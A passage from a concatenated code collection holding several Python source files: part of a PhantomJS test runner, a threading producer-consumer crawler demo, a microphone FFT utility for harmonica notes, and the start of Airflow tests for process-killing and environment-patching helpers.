            messages.insert(0, line)
            self.add_error(messages, "Plan line not interpretable")
            if i + 1 < len(out):
                self.add_skip(out[(i+1):], "All further output ignored")
            return
        else:
            # loop exhausted without hitting `break`: no plan at all
            self.add_error(messages, "No plan line detected in output")
            return

        max_point = int(m.group(1))
        if max_point == 0:
            # "1..0 # SKIP" plan: the whole group is skipped (or errored)
            if any(msg.startswith("ERROR:") for msg in messages):
                self.add_error(messages, m.group(2) or "Test group skipped")
            else:
                self.add_skip(messages, m.group(2) or "Test group skipped")
            if i + 1 < len(out):
                self.add_skip(out[(i+1):], "All further output ignored")
            return

        prev_point = 0
        for i in range(i+1, len(out)):
            line = out[i]
            m = self.diag_r.match(line)
            if m:
                if not m.group(1):
                    messages.append(m.group(2))
                continue

            m = self.test_r.match(line)
            if m:
                status = m.group(1)
                point = m.group(2)
                desc = m.group(3)
                dirv = m.group(4)

                if point:
                    point = int(point)
                else:
                    # unnumbered test points count up from the previous one
                    point = prev_point + 1

                if point in points_already_used:
                    # A reused test point is an error.
                    self.add_error(messages, desc + " [test point repeated]")
                else:
                    points_already_used.add(point)

                    # A point above the plan limit is an automatic *fail*.
                    # The test suite relies on this in testing exit().
                    if point > max_point:
                        status = "not ok"

                    if status == "ok":
                        if not dirv:
                            self.add_pass(messages, desc)
                        elif dirv == "TODO":
                            self.add_xpass(messages, desc)
                        elif dirv == "SKIP":
                            self.add_skip(messages, desc)
                        else:
                            self.add_error(messages, desc +
                                           " [ok, with invalid directive "+dirv+"]")
                    else:
                        if not dirv:
                            self.add_fail(messages, desc)
                        elif dirv == "TODO":
                            self.add_xfail(messages, desc)
                        else:
                            self.add_error(messages, desc +
                                           " [not ok, with invalid directive "+dirv+"]")

                del messages[:]
                prev_point = point
            else:
                self.add_error([line], "neither a test nor a diagnostic")

        # Any output on stderr is an error, with one exception: the timeout
        # message added by record_process_output, which is treated as an
        # unnumbered "not ok".
        if err:
            if len(err) == 1 and err[0].startswith("TIMEOUT: "):
                points_already_used.add(prev_point + 1)
                self.add_fail(messages, err[0][len("TIMEOUT: "):])
            else:
                self.add_error(err, "Unexpected output on stderr")

        # Any missing test points are fails.
        for pt in range(1, max_point+1):
            if pt not in points_already_used:
                self.add_fail([], "test {} did not report status".format(pt))
class TestRunner(object):
    """Discovers PhantomJS test scripts, runs each one, and reports results.

    `base_path` is the directory containing the test tree, `phantomjs_exe`
    the runner script, and `options` the parsed command-line namespace
    (verbose / debugger / to_run / run_unsupported).
    """

    def __init__(self, base_path, phantomjs_exe, options):
        self.base_path       = base_path
        self.cert_path       = os.path.join(base_path, 'certs')
        self.harness         = os.path.join(base_path, 'testharness.js')
        self.phantomjs_exe   = phantomjs_exe
        self.verbose         = options.verbose
        self.debugger        = options.debugger
        self.to_run          = options.to_run
        self.run_unsupported = options.run_unsupported
        self.server_errs     = []

    def signal_server_error(self, exc_info):
        """Record an exception raised inside the HTTP test server thread;
        run_tests() reports these as their own group."""
        self.server_errs.append(exc_info)

    def get_base_command(self, debugger):
        """Return the argv prefix that launches PhantomJS, possibly wrapped
        in a debugger. Raises RuntimeError for an unknown debugger name."""
        if debugger is None:
            return ["node", self.phantomjs_exe]
        elif debugger == "gdb":
            return ["gdb", "--args", "node", self.phantomjs_exe]
        elif debugger == "lldb":
            return ["lldb", "--", "node", self.phantomjs_exe]
        elif debugger == "valgrind":
            return ["valgrind", "node", self.phantomjs_exe]
        else:
            # Report the value this method actually dispatched on (was
            # self.debugger; identical on every current call path, but the
            # parameter is the authoritative value here).
            raise RuntimeError("Don't know how to invoke " + debugger)

    def run_phantomjs(self, script,
                      script_args=None, pjs_args=None, stdin_data=None,
                      timeout=TIMEOUT, silent=False):
        """Run one PhantomJS invocation.

        Returns (exit_code, stdout_lines, stderr_lines). `silent` suppresses
        verbosity and debugger use (used for the startup version probe).
        """
        # None sentinels instead of mutable [] defaults (shared-default pitfall).
        if script_args is None:
            script_args = []
        if pjs_args is None:
            pjs_args = []
        if stdin_data is None:
            stdin_data = []

        verbose  = self.verbose
        debugger = self.debugger
        if silent:
            verbose = False
            debugger = None

        command = self.get_base_command(debugger)
        command.extend(pjs_args)
        command.append(script)
        if verbose:
            command.append('--verbose={}'.format(verbose))
        command.extend(script_args)

        if verbose >= 3:
            sys.stdout.write("## running {}\n".format(" ".join(command)))

        if debugger:
            # FIXME: input-feed mode doesn't work with a debugger,
            # because how do you tell the debugger that the *debuggee*
            # needs to read from a pipe?
            subprocess.call(command)
            return 0, [], []
        else:
            return do_call_subprocess(command, verbose, stdin_data, timeout)

    def run_test(self, script, name):
        """Run one test script after honoring its '//!' directive header.

        Returns a TestGroup subclass describing the outcome (TAP parse,
        explicit expectations, or unsupported/error).
        """
        script_args = []
        pjs_args = []
        use_harness = True
        use_snakeoil = False
        stdin_data = []
        stdout_exp = []
        stderr_exp = []
        rc_exp = None
        stdout_xfail = False
        stderr_xfail = False
        rc_xfail = False
        timeout = TIMEOUT
        unsupported = False

        def require_args(what, i, tokens):
            # Reject a ':'-suffixed directive with nothing after it.
            if i+1 == len(tokens):
                raise ValueError(what + "directive requires an argument")

        if self.verbose >= 3:
            sys.stdout.write(colorize("^", name) + ":\n")

        # Parse any directives at the top of the script.
        try:
            with open(script, "rt") as s:
                for line in s:
                    if not line.startswith("//!"):
                        break  # directives form a contiguous leading block
                    tokens = shlex.split(line[3:], comments=True)

                    skip = False
                    for i in range(len(tokens)):
                        if skip:
                            # Token already consumed as the previous
                            # directive's argument.
                            skip = False
                            continue
                        tok = tokens[i]
                        if tok == "unsupported":
                            unsupported = True
                        elif tok == "no-harness":
                            use_harness = False
                        elif tok == "snakeoil":
                            use_snakeoil = True
                        elif tok == "expect-exit-fails":
                            rc_xfail = True
                        elif tok == "expect-stdout-fails":
                            stdout_xfail = True
                        elif tok == "expect-stderr-fails":
                            stderr_xfail = True
                        elif tok == "timeout:":
                            require_args(tok, i, tokens)
                            timeout = float(tokens[i+1])
                            if timeout <= 0:
                                raise ValueError("timeout must be positive")
                            skip = True
                        elif tok == "expect-exit:":
                            require_args(tok, i, tokens)
                            rc_exp = int(tokens[i+1])
                            skip = True
                        elif tok == "phantomjs:":
                            # These directives consume the rest of the line.
                            require_args(tok, i, tokens)
                            pjs_args.extend(tokens[(i+1):])
                            break
                        elif tok == "script:":
                            require_args(tok, i, tokens)
                            script_args.extend(tokens[(i+1):])
                            break
                        elif tok == "stdin:":
                            require_args(tok, i, tokens)
                            stdin_data.append(" ".join(tokens[(i+1):]) + "\n")
                            break
                        elif tok == "expect-stdout:":
                            require_args(tok, i, tokens)
                            stdout_exp.append(" ".join(tokens[(i+1):]))
                            break
                        elif tok == "expect-stderr:":
                            require_args(tok, i, tokens)
                            stderr_exp.append(" ".join(tokens[(i+1):]))
                            break
                        else:
                            raise ValueError("unrecognized directive: " + tok)

        except Exception as e:
            # A malformed header or unreadable file becomes a test error.
            grp = TestGroup(name)
            if hasattr(e, 'strerror') and hasattr(e, 'filename'):
                grp.add_error([], '{} ({}): {}\n'
                              .format(name, e.filename, e.strerror))
            else:
                grp.add_error([], '{} ({}): {}\n'
                              .format(name, script, str(e)))
            return grp

        if use_harness:
            # The harness becomes the entry point; the test is its first arg.
            script_args.insert(0, script)
            script = self.harness
        if use_snakeoil:
            pjs_args.insert(0, '--ssl-certificates-path=' + self.cert_path)

        if unsupported and not self.run_unsupported:
            return UnsupportedTestGroup(name)

        rc, out, err = self.run_phantomjs(script, script_args, pjs_args,
                                          stdin_data, timeout)

        # Explicit expectations use the expect-checker; otherwise parse TAP.
        if rc_exp or stdout_exp or stderr_exp:
            grp = ExpectTestGroup(name,
                                  rc_exp, stdout_exp, stderr_exp,
                                  rc_xfail, stdout_xfail, stderr_xfail)
        else:
            grp = TAPTestGroup(name)
        grp.parse(rc, out, err)
        return grp

    def run_tests(self):
        """Run every selected test plus the HTTP-server-error pseudo-group;
        return the process exit status from report()."""
        start = time.time()
        base = self.base_path
        nlen = len(base) + 1
        results = []
        for test_glob in TESTS:
            test_glob = os.path.join(base, test_glob)

            for test_script in sorted(glob.glob(test_glob)):
                tname = os.path.splitext(test_script)[0][nlen:]
                if self.to_run:
                    # Substring filter; the for/else skips scripts that
                    # match none of the requested names.
                    for to_run in self.to_run:
                        if to_run in tname:
                            break
                    else:
                        continue

                # (An unused 'any_executed' flag was dropped here; the
                # "nothing ran" case is detected in report() via len(results).)
                grp = self.run_test(test_script, tname)
                grp.report_for_verbose_level(sys.stdout, self.verbose)
                results.append(grp)

        # Errors signalled by the embedded HTTP server become their own group.
        grp = TestGroup("HTTP server errors")
        for ty, val, tb in self.server_errs:
            grp.add_error(traceback.format_tb(tb, 5),
                          traceback.format_exception_only(ty, val)[-1])
        grp.report_for_verbose_level(sys.stdout, self.verbose)
        results.append(grp)
        sys.stdout.write("\n")
        return self.report(results, time.time() - start)

    def report(self, results, elapsed):
        """Print the summary for all groups; return 0 on success, 1 otherwise."""
        # There is always one test group, for the HTTP server errors.
        if len(results) == 1:
            sys.stderr.write("No tests selected for execution.\n")
            return 1

        n = [0] * T.MAX
        for grp in results:
            # In quiet mode, failing groups were not printed yet — do it now.
            if self.verbose == 0 and not grp.is_successful():
                grp.report(sys.stdout, False)
            for i, x in enumerate(grp.n): n[i] += x

        sys.stdout.write("{:6.3f}s elapsed\n".format(elapsed))
        for s in (T.PASS, T.FAIL, T.XPASS, T.XFAIL, T.ERROR, T.SKIP, T.UNSUPPORTED):
            if n[s]:
                sys.stdout.write(" {:>4} {}\n".format(n[s], s.long_label))

        # Unexpected failures (FAIL/XPASS/ERROR) drive the exit status.
        if n[T.FAIL] == 0 and n[T.XPASS] == 0 and n[T.ERROR] == 0:
            return 0
        else:
            return 1
def init():
    """Parse the command line, sanity-check the runner, and build a TestRunner."""
    here = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
    shim = os.path.normpath(here + '/../../../phantom_shim/runner.js')
    if not os.path.isfile(shim):
        sys.stdout.write("{} is unavailable, cannot run tests.\n"
                         .format(shim))
        sys.exit(1)

    ap = argparse.ArgumentParser(description='Run PhantomJS tests.')
    ap.add_argument('-v', '--verbose', action='count', default=0,
                    help='Increase verbosity of logs (repeat for more)')
    ap.add_argument('to_run', nargs='*', metavar='test',
                    help='tests to run (default: all of them)')
    ap.add_argument('--debugger', default=None,
                    help="Run PhantomJS under DEBUGGER")
    ap.add_argument('--run-unsupported', action='count', default=0,
                    help='Run unsupported tests.')
    ap.add_argument('--color', metavar="WHEN", default='auto',
                    choices=['always', 'never', 'auto'],
                    help="colorize the output; can be 'always',"
                    " 'never', or 'auto' (the default)")

    opts = ap.parse_args()
    activate_colorization(opts)
    runner = TestRunner(here, shim, opts)

    if opts.verbose:
        # Probe the runner once so a broken install fails fast.
        rc, ver, err = runner.run_phantomjs('--version', silent=True)
        if rc != 0 or len(ver) != 1 or len(err) != 0:
            sys.stdout.write(colorize("R", "FATAL")+": Version check failed\n")
            for l in ver:
                sys.stdout.write(colorize("b", "## " + l) + "\n")
            for l in err:
                sys.stdout.write(colorize("b", "## " + l) + "\n")
            sys.stdout.write(colorize("b", "## exit {}".format(rc)) + "\n")
            sys.exit(1)
        sys.stdout.write(colorize("b", "## Testing PhantomJS "+ver[0])+"\n")

    # Force an unusual timezone for the whole suite: Chatham Islands
    # Standard Time, UTC+12:45 — deliberately not a whole number of hours
    # from UTC and more than twelve hours offset, to shake out timezone
    # bugs.  DST is not modelled: issues reproducible on only two days a
    # year are not worth the trouble.  Remember a TZ offset is written with
    # the opposite sign from the usual notation (UTC+1 would be xxx-1:00).
    os.environ["TZ"] = "CIST-12:45:00"
    return runner
def main():
    """Entry point: start the HTTP test server, run the suite, and exit with
    the suite's status (1 on fatal error, 2 on keyboard interrupt)."""
    runner = init()
    try:
        # The server context manager forwards its internal errors to the
        # runner via signal_server_error; they are reported as a test group.
        with HTTPTestServer(runner.base_path,
                            runner.signal_server_error,
                            runner.verbose):
            sys.exit(runner.run_tests())

    except Exception:
        trace = traceback.format_exc(5).split("\n")
        # there will be a blank line at the end of 'trace'
        sys.stdout.write(colorize("R", "FATAL") + ": " + trace[-2] + "\n")
        for line in trace[:-2]:
            sys.stdout.write(colorize("b", "## " + line) + "\n")
        sys.exit(1)

    except KeyboardInterrupt:
        # Still reachable despite appearing after the broad clause:
        # KeyboardInterrupt derives from BaseException, not Exception.
        # (SystemExit from the sys.exit above likewise passes through.)
        sys.exit(2)

main()
|
threads_share_varables.py | import threading
import time
from random import randint
# Shared work queue: filled by get_url_list (producer), drained by
# get_html_detail (consumers).
# NOTE(review): a plain list with no lock — append/pop from several threads
# relies on CPython's GIL; a queue.Queue would be the safe choice.
url_list=[]

def get_url_list():
    """Producer: forever append batches of 10 fake article URLs to url_list,
    sleeping 2 seconds between batches."""
    global url_list
    # Scrape the article-list page's URLs: the producer side.
    print("get_url_list begining")
    while True:
        for i in range(10):
            url_list.append("www.studyai.com/"+str(randint(1,2000))+"/")
        time.sleep(2)
        print("生产者又生产了10个url")
def get_html_detail(id):
    """Consumer #id: forever pop URLs from the shared url_list and simulate
    crawling each detail page (1-second sleep per URL)."""
    global url_list
    # Crawl the detail pages for the URLs in the list: the consumer side.
    print("get_html_detail begining")
    while True:
        print("剩余url个数:", len(url_list))
        if len(url_list)>0:
            # for url in url_list:
            url = url_list.pop()
            print("#"+str(id)+" 正在爬取详情页:"+url)
            time.sleep(1)
        else:
            # NOTE(review): no sleep on this branch — while the list is empty
            # this thread busy-spins, printing continuously.
            print("url 列表为空啦~~")
            # break
if __name__ == "__main__":
    start_time = time.time()
    # One producer thread...
    list_thread = threading.Thread(target=get_url_list)
    list_thread.start()
    # list_thread.join()
    # ...and five consumer threads, all sharing the same url_list.
    detail_threads=[]
    for k in range(5):
        detail_thread = threading.Thread(target=get_html_detail,args=(k,))
        detail_threads.append(detail_thread)
        detail_thread.start()
        # detail_thread.join()
    # NOTE(review): measured immediately after start() with no join(), and
    # the workers loop forever — this prints thread start-up time only.
    consumed_time = time.time() - start_time
    print("time consumed: ", consumed_time)
|
audio_utils.py | # This file is a highly modified version of the file SWHear.py
# from https://github.com/swharden/Python-GUI-examples
# http://www.SWHarden.com
# The license for this file is the MIT License, both for the original and for all my modifications.
# This was only used to profile the memory usage of the object.
# import memory_profiler
# Optimization of the code, compiling it just-in-time with Numba (only works with the Anaconda distribution).
# It is not currently used because it is not needed.
#from numba import jit
# Put the @jit tag on the line before the function to optimize; it only works with functions.
# @jit
import pyaudio
import time
import numpy as np
import threading
# import harmonica_notes_and_holes
from harmonica_notes_and_holes import get_external_list_holes, get_external_orde_notes_name_list, get_external_orde_notes_freq_list
# Hole/note lookup table shared across this module; populated once at import
# time from the external harmonica tables (the main source file defines them).
# list_holes = harmonica_notes_and_holes.get_external_list_holes()
list_holes = get_external_list_holes()
# We are going to join 4 buffers of 2205 samples and only then calculate the FFT, in the hope that by making
# the input buffer longer (more samples) we can have an FFT with more points and a smaller bucket size,
# so that the small frequency differences of the lower notes can be well separated between Blow
# and Draw, and not mismatched. We are going to have 4 buckets for each original bucket.
# Index (0-3) of the quarter of the rolling FFT buffer to fill next.
flag_FFT_buffer_part_num = 0
# Point count of the most recent FFT; exposed read-only via get_len_FFT().
len_FFT = 0
def get_len_FFT():
    """Return the point count of the most recently computed FFT."""
    # Reading a module-level global needs no 'global' declaration.
    return len_FFT
#@jit
def realtime_processa_buffers_de_rolling_FFT( self, flag_FFT_buffer_part_num ):
    """Read one audio chunk into the quarter-buffer selected by
    flag_FFT_buffer_part_num, rebuild self.data as the four quarters
    concatenated in chronological order (oldest first), and return the index
    of the next quarter to fill (wraps 3 -> 0).

    `self` must provide .stream (with a read() method), .chunk (frames per
    read) and the four .data_buffer_N attributes (None on the first call).
    """
    if flag_FFT_buffer_part_num == 0:
        # Drop the reference so the old block can be freed before we allocate.
        self.data_buffer_0 = None
        # np.frombuffer replaces the deprecated np.fromstring for raw bytes.
        # It returns a read-only view, which is fine here: these buffers are
        # only ever concatenated, never mutated in place.
        self.data_buffer_0 = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
        flag_FFT_buffer_part_num += 1
        # First call ever: the other three quarters don't exist yet, so start
        # them as silence of the same length (keeps FFT size constant).
        if self.data_buffer_1 is None:
            len_buffer_0 = len(self.data_buffer_0)
            self.data_buffer_1 = np.zeros(len_buffer_0, dtype=np.int16)
            self.data_buffer_2 = np.zeros(len_buffer_0, dtype=np.int16)
            self.data_buffer_3 = np.zeros(len_buffer_0, dtype=np.int16)
        # Oldest quarter first, freshly-read quarter last.
        self.data = np.concatenate([self.data_buffer_1,
                                    self.data_buffer_2,
                                    self.data_buffer_3,
                                    self.data_buffer_0])
    elif flag_FFT_buffer_part_num == 1:
        self.data_buffer_1 = None
        self.data_buffer_1 = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
        flag_FFT_buffer_part_num += 1
        self.data = np.concatenate([self.data_buffer_2,
                                    self.data_buffer_3,
                                    self.data_buffer_0,
                                    self.data_buffer_1])
    elif flag_FFT_buffer_part_num == 2:
        self.data_buffer_2 = None
        self.data_buffer_2 = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
        flag_FFT_buffer_part_num += 1
        self.data = np.concatenate([self.data_buffer_3,
                                    self.data_buffer_0,
                                    self.data_buffer_1,
                                    self.data_buffer_2])
    elif flag_FFT_buffer_part_num == 3:
        self.data_buffer_3 = None
        self.data_buffer_3 = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
        # Wrap around to quarter 0 for the next call.
        flag_FFT_buffer_part_num = 0
        # e.g. four 2205-sample chunks -> one 8820-sample analysis window.
        # Not a power of two, but the best we can do with this chunk size.
        self.data = np.concatenate([self.data_buffer_0,
                                    self.data_buffer_1,
                                    self.data_buffer_2,
                                    self.data_buffer_3])
    return flag_FFT_buffer_part_num
#@jit
def getFFT(data, rate):
    """Hamming-window *data*, take the real FFT, and return the lower half.

    Returns a tuple (freqs, magnitudes, full_fft_length): freqs and
    magnitudes keep only the first half of the rfft points; full_fft_length
    is the untruncated rfft size.
    """
    n = len(data)
    windowed = np.hamming(n) * data
    magnitudes = np.abs(np.fft.rfft(windowed))
    full_len = len(magnitudes)
    freqs = np.fft.rfftfreq(n, 1.0 / rate)
    return ( freqs[:int(len(freqs) / 2)], magnitudes[:int(full_len / 2)], full_len )
class AudioUtils():
    """Microphone capture with a rolling buffer and continuous FFT.

    Arguments:
        device: None to auto-detect the sound card, or a PyAudio device index.
        rate: sample rate; defaults to the device's supported rate.
        updatesPerSecond: number of buffers read from the device per second.
    """

    def __init__(self,device=None,rate=None,updatesPerSecond=10):
        self.p=pyaudio.PyAudio()
        # Placeholder; initiate() recomputes this as rate/updatesPerSecond
        # (e.g. 2205 samples at 44100 Hz with 20 updates per second).
        self.chunk=4096 # This value can change by the device, in my case is 2205 samples.
        self.updatesPerSecond=updatesPerSecond
        self.chunksRead=0
        self.device=device
        self.rate=rate

    ### SYSTEM TESTS

    def valid_low_rate(self,device):
        """Return the lowest supported audio rate for *device*, or None."""
        for testrate in [44100]:
            if self.valid_test(device,testrate):
                return testrate
        print("...something is wrong, can't use the device, maybe you have more devices that device 0 (zero)",device)
        return None

    def valid_test(self,device,rate=44100):
        """Given a device ID and a rate, return True/False if it's valid
        (can be opened for mono int16 input)."""
        try:
            self.info=self.p.get_device_info_by_index(device)
            if not self.info["maxInputChannels"]>0:
                return False
            stream=self.p.open(format=pyaudio.paInt16,channels=1,
                               input_device_index=device,frames_per_buffer=self.chunk,
                               rate=int(self.info["defaultSampleRate"]),input=True)
            stream.close()
            return True
        except Exception:
            # Was a bare 'except:'; narrowed so KeyboardInterrupt/SystemExit
            # are no longer swallowed while probing devices.
            return False

    def valid_input_devices(self):
        """
        See which devices can be opened for microphone input.
        Call this when no stream is open yet.
        """
        mics=[]
        for device in range(self.p.get_device_count()):
            if self.valid_test(device):
                mics.append(device)
        if len(mics)==0:
            print("no microphone devices found!")
        else:
            print("found %d microphone devices: %s"%(len(mics),mics))
        return mics

    ### SETUP AND SHUTDOWN

    def initiate(self):
        """Run this after changing settings (like rate) and before recording."""
        if self.device is None:
            self.device=self.valid_input_devices()[0] # pick the first one
        if self.rate is None:
            self.rate=self.valid_low_rate(self.device)
        self.chunk = int(self.rate/self.updatesPerSecond) # hold one update's worth of audio
        if not self.valid_test(self.device,self.rate):
            print("guessing a valid microphone device/rate...")
            self.device=self.valid_input_devices()[0] #pick the first one
            self.rate=self.valid_low_rate(self.device)
        self.datax=np.arange(self.chunk)/float(self.rate)
        msg='recording from "%s" '%self.info["name"]
        msg+='(device %d) '%self.device
        msg+='at %d Hz'%self.rate
        print(msg)

    def close(self):
        """Gently detach from the stream, the reader thread, and PyAudio."""
        print(" - sending stream termination command...")
        self.keepRecording=False #the threads should self-close
        # Thread.isAlive() was removed in Python 3.9; is_alive() is the
        # correct spelling on every Python 3 version.
        while(self.t.is_alive()): #wait for all threads to close
            time.sleep(.1)
        self.stream.stop_stream()
        self.p.terminate()

    ### STREAM HANDLING

    def stream_readchunk(self):
        """Reader-thread body: loop reading audio into a rolling buffer and
        computing the FFT until self.keepRecording goes False."""
        global flag_FFT_buffer_part_num
        # Prime and size the rolling buffer from one real read.
        # np.frombuffer replaces the deprecated np.fromstring; the read-only
        # view it returns is fine because it is only copied from.
        data_buffer_initial = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
        len_buffer = len(data_buffer_initial)
        step = len_buffer
        # Rolling window of 4 chunks (deeper windows were tried: * 8, * 32).
        len_buffer_rolling = len_buffer * 4
        self.data = np.zeros(len_buffer_rolling, 'f')
        try:
            while(self.keepRecording == True):
                # Shift the window left by one chunk and append the new chunk.
                self.data = np.roll(self.data, -step)
                self.data[-step:] = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
                # flag_FFT_buffer_part_num is never advanced here (the
                # quarter-buffer path realtime_processa_buffers_de_rolling_FFT
                # is disabled), so it stays 0 and the FFT runs every chunk.
                # The deeper rolling buffer gives more FFT points and hence
                # finer frequency resolution for note-bending display.
                if (flag_FFT_buffer_part_num == 0 or
                    flag_FFT_buffer_part_num == 2):
                    # Calc FFT.
                    self.fftx, self.fft, ret_lenFFT = getFFT(self.data, self.rate)
                    global len_FFT
                    len_FFT = ret_lenFFT
                self.chunksRead+=1
                time.sleep(0.0001)
        except Exception:
            print(" - an exception ocorred!")
        self.keepRecording=False
        self.stream.close()
        self.p.terminate()
        print(" - stream STOPPED")
        self.chunksRead+=1

    def stream_thread_new(self):
        """Start the reader loop in a background thread (kept in self.t)."""
        self.t=threading.Thread(target=self.stream_readchunk)
        self.t.start()

    def stream_start(self):
        """Open the input stream and start filling self.data until close()."""
        self.initiate()
        print(" - starting audio stream")
        self.keepRecording=True # set this to False later to terminate stream
        self.data=None # will fill up with threaded recording data
        self.fft=None
        self.data_buffer_0 = None
        self.data_buffer_1 = None
        self.data_buffer_2 = None
        self.data_buffer_3 = None
        self.stream=self.p.open(format=pyaudio.paInt16,channels=1,
                                rate=self.rate,input=True,frames_per_buffer=self.chunk)
        self.stream_thread_new()
# if __name__== "__main__":
# mic=AudioUtils(updatesPerSecond=10)
# mic.stream_start() # Starts a new loop inside a new thread.
# lastRead=mic.chunksRead
# while True:
# while lastRead==mic.chunksRead:
# time.sleep(.01)
# print(mic.chunksRead,len(mic.data))
# lastRead=mic.chunksRead
|
test_process_utils.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import subprocess
import time
import unittest
from contextlib import suppress
from subprocess import CalledProcessError
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import psutil
import pytest
from airflow.exceptions import AirflowException
from airflow.utils import process_utils
from airflow.utils.process_utils import check_if_pidfile_process_is_running, execute_in_subprocess, log
class TestReapProcessGroup(unittest.TestCase):
    """Tests for process_utils.reap_process_group()."""

    @staticmethod
    def _ignores_sigterm(child_pid, child_setup_done):
        """Child target: install a no-op SIGTERM handler, publish our PID,
        then spin forever (killable only via SIGKILL)."""
        def signal_handler(unused_signum, unused_frame):
            pass
        signal.signal(signal.SIGTERM, signal_handler)
        child_pid.value = os.getpid()
        # Tell the parent we are fully set up before it proceeds.
        child_setup_done.release()
        while True:
            time.sleep(1)

    @staticmethod
    def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
        """Parent target: start a new session (own process group), ignore
        SIGTERM, and spawn a SIGTERM-ignoring child; then spin forever."""
        def signal_handler(unused_signum, unused_frame):
            pass
        # New session so the parent+child form one reapable process group.
        os.setsid()
        signal.signal(signal.SIGTERM, signal_handler)
        child_setup_done = multiprocessing.Semaphore(0)
        child = multiprocessing.Process(
            target=TestReapProcessGroup._ignores_sigterm, args=[child_pid, child_setup_done]
        )
        child.start()
        child_setup_done.acquire(timeout=5.0)
        parent_pid.value = os.getpid()
        # Only signal readiness once the child is running too.
        setup_done.release()
        while True:
            time.sleep(1)

    def test_reap_process_group(self):
        """
        Spin up a process that can't be killed by SIGTERM and make sure
        it gets killed anyway.
        """
        parent_setup_done = multiprocessing.Semaphore(0)
        parent_pid = multiprocessing.Value('i', 0)
        child_pid = multiprocessing.Value('i', 0)
        args = [parent_pid, child_pid, parent_setup_done]
        parent = multiprocessing.Process(target=TestReapProcessGroup._parent_of_ignores_sigterm, args=args)
        try:
            parent.start()
            assert parent_setup_done.acquire(timeout=5.0)
            assert psutil.pid_exists(parent_pid.value)
            assert psutil.pid_exists(child_pid.value)
            # Both processes ignore SIGTERM, so reaping must escalate.
            process_utils.reap_process_group(parent_pid.value, logging.getLogger(), timeout=1)
            assert not psutil.pid_exists(parent_pid.value)
            assert not psutil.pid_exists(child_pid.value)
        finally:
            # Best-effort cleanup in case the reap failed.
            try:
                os.kill(parent_pid.value, signal.SIGKILL)  # terminate doesn't work here
                os.kill(child_pid.value, signal.SIGKILL)  # terminate doesn't work here
            except OSError:
                pass
class TestExecuteInSubProcess(unittest.TestCase):
    """Behavior of process_utils.execute_in_subprocess()."""

    def test_should_print_all_messages1(self):
        # Every line the child writes must surface through the utility's logger.
        with self.assertLogs(log) as captured:
            execute_in_subprocess(["bash", "-c", "echo CAT; echo KITTY;"])
        emitted = [entry.getMessage() for entry in captured.records]
        assert emitted == ["Executing cmd: bash -c 'echo CAT; echo KITTY;'", 'Output:', 'CAT', 'KITTY']

    def test_should_raise_exception(self):
        # A non-zero exit status must propagate as CalledProcessError.
        with pytest.raises(CalledProcessError):
            process_utils.execute_in_subprocess(["bash", "-c", "exit 1"])
def my_sleep_subprocess():
    """Child-process target that simply sleeps (killable by SIGTERM)."""
    sleep(100)
def my_sleep_subprocess_with_signals():
    """Child-process target that ignores SIGINT/SIGTERM, forcing SIGKILL."""
    signal.signal(signal.SIGINT, lambda signum, frame: None)
    signal.signal(signal.SIGTERM, lambda signum, frame: None)
    sleep(100)
class TestKillChildProcessesByPids(unittest.TestCase):
    """Tests for process_utils.kill_child_processes_by_pids()."""

    def test_should_kill_process(self):
        """A well-behaved child disappears via the default (SIGTERM) path."""
        # Count system processes before, so we can see one appear then vanish.
        before_num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")

        process = multiprocessing.Process(target=my_sleep_subprocess, args=())
        process.start()
        sleep(0)

        num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
        assert before_num_process + 1 == num_process

        process_utils.kill_child_processes_by_pids([process.pid])

        num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
        assert before_num_process == num_process

    def test_should_force_kill_process(self):
        """A child ignoring SIGTERM is escalated to SIGKILL when timeout=0."""
        process = multiprocessing.Process(target=my_sleep_subprocess_with_signals, args=())
        process.start()
        sleep(0)

        all_processes = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().splitlines()
        assert str(process.pid) in map(lambda x: x.strip(), all_processes)

        # The forced kill must also be logged.
        with self.assertLogs(process_utils.log) as cm:
            process_utils.kill_child_processes_by_pids([process.pid], timeout=0)
        assert any("Killing child PID" in line for line in cm.output)
        sleep(0)

        all_processes = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().splitlines()
        assert str(process.pid) not in map(lambda x: x.strip(), all_processes)
class TestPatchEnviron(unittest.TestCase):
    """Tests for the process_utils.patch_environ() context manager."""

    def test_should_update_variable_and_restore_state_when_exit(self):
        """Values set inside the context are visible there and rolled back on exit."""
        # Baseline: TEST_EXISTS set, TEST_NOT_EXISTS absent.
        with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
            del os.environ["TEST_NOT_EXISTS"]

            assert "BEFORE" == os.environ["TEST_EXISTS"]
            assert "TEST_NOT_EXISTS" not in os.environ

            with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
                assert "AFTER" == os.environ["TEST_NOT_EXISTS"]
                assert "AFTER" == os.environ["TEST_EXISTS"]

            # On exit: prior value restored, previously-absent key removed again.
            assert "BEFORE" == os.environ["TEST_EXISTS"]
            assert "TEST_NOT_EXISTS" not in os.environ

    def test_should_restore_state_when_exception(self):
        """Rollback must also happen when the context body raises."""
